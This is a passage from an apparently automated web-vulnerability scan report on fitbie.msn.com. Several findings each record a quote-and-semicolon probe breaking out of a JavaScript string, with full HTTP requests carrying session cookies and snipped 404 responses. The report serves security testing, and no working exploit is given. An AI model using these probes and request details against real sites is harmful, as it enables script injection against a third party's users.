The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 153c1'%3be1a3fda9046 was submitted in the REST URL parameter 2. This input was echoed as 153c1';e1a3fda9046 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default153c1'%3be1a3fda9046/files/after-randy-sumey-th.jpg?1296857455 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:34 +0000
ETag: "1297607194-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:34 GMT
Date: Sun, 13 Feb 2011 14:26:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default153c1';e1a3fda9046?destination=node%2Fdefault153c1';e1a3fda9046&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.79. http://fitbie.msn.com/sites/default/files/belly_off_th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/belly_off_th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf005'%3b07107bf5112 was submitted in the REST URL parameter 2. This input was echoed as cf005';07107bf5112 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultcf005'%3b07107bf5112/files/belly_off_th_0.jpg?1285890306 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:40 +0000
ETag: "1297607200-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:40 GMT
Date: Sun, 13 Feb 2011 14:26:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultcf005';07107bf5112?destination=node%2Fdefaultcf005';07107bf5112&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.80. http://fitbie.msn.com/sites/default/files/bicycling_th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/bicycling_th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7705'%3be822129f108 was submitted in the REST URL parameter 2. This input was echoed as d7705';e822129f108 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultd7705'%3be822129f108/files/bicycling_th.jpg?1286563952 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:30:02 +0000
ETag: "1297607402-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:30:03 GMT
Date: Sun, 13 Feb 2011 14:30:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd7705';e822129f108?destination=node%2Fdefaultd7705';e822129f108&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.81. http://fitbie.msn.com/sites/default/files/bride-slim-healthy-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/bride-slim-healthy-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ba9'%3be2714c5ba01 was submitted in the REST URL parameter 2. This input was echoed as 58ba9';e2714c5ba01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default58ba9'%3be2714c5ba01/files/bride-slim-healthy-th.jpg?1297456061 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:11 +0000
ETag: "1297607171-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:11 GMT
Date: Sun, 13 Feb 2011 14:26:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default58ba9';e2714c5ba01?destination=node%2Fdefault58ba9';e2714c5ba01&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.82. http://fitbie.msn.com/sites/default/files/cephas-after-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/cephas-after-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50274'%3b40f5c2961f6 was submitted in the REST URL parameter 2. This input was echoed as 50274';40f5c2961f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default50274'%3b40f5c2961f6/files/cephas-after-th.jpg?1294788044 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:40 +0000
ETag: "1297607200-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:40 GMT
Date: Sun, 13 Feb 2011 14:26:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default50274';40f5c2961f6?destination=node%2Fdefault50274';40f5c2961f6&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.83. http://fitbie.msn.com/sites/default/files/couple-eating-healthy-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/couple-eating-healthy-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2671'%3bbcb29dbbd1a was submitted in the REST URL parameter 2. This input was echoed as d2671';bcb29dbbd1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultd2671'%3bbcb29dbbd1a/files/couple-eating-healthy-th.jpg?1297186295 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:10 +0000
ETag: "1297607170-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:11 GMT
Date: Sun, 13 Feb 2011 14:26:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd2671';bcb29dbbd1a?destination=node%2Fdefaultd2671';bcb29dbbd1a&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.84. http://fitbie.msn.com/sites/default/files/crush-calories-workout-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/crush-calories-workout-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1090'%3be21a020cc9c was submitted in the REST URL parameter 2. This input was echoed as e1090';e21a020cc9c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaulte1090'%3be21a020cc9c/files/crush-calories-workout-th.jpg?1292964212 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:17 +0000
ETag: "1297607177-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:18 GMT
Date: Sun, 13 Feb 2011 14:26:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulte1090';e21a020cc9c?destination=node%2Fdefaulte1090';e21a020cc9c&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.85. http://fitbie.msn.com/sites/default/files/curtsy-salute-th_1.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/curtsy-salute-th_1.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b04'%3bea0f9356189 was submitted in the REST URL parameter 2. This input was echoed as 47b04';ea0f9356189 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default47b04'%3bea0f9356189/files/curtsy-salute-th_1.jpg?1293522424 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/after
Accept: */*
